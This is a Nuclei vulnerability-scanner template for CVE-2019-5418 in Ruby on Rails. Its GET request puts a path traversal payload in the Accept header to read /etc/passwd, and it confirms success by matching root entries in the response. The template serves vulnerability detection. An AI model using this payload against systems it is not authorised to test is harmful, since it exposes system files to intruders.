nuclei-templates/cves/2019/CVE-2019-5418.yaml

35 lines
1.0 KiB
YAML

id: CVE-2019-5418
info:
name: Rails File Content Disclosure
author: omarkurt
severity: high
description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
reference:
- https://github.com/omarkurt/CVE-2019-5418
- https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
- https://nvd.nist.gov/vuln/detail/CVE-2019-5418
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2019-5418
tags: cve,cve2019,rails,lfi,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Accept: ../../../../../../../../etc/passwd{{
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/12